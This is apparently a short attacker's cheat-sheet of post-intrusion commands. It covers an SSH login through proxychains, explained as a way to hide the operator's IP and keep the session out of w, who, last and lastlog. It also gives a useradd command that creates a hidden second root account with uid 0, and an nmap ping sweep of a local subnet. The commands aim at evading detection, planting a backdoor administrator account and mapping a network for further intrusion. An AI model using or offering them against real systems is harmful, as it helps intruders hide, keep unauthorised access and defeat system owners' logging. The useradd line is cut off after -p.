SSH to remote server

proxychains ssh -T login_name@Remote_IP /bin/bash -i

Use proxychains, so our IP would not be shown there. And use -T so w, who, last, lastlog will not show our account.

Create a user with root privileges

useradd -g 0 -G root,bin,daemon,sys,adm,disk,wheel -M -o -u 0 -p


Reveal subnet mathines

nmap -v -sP 192.168.0.0/24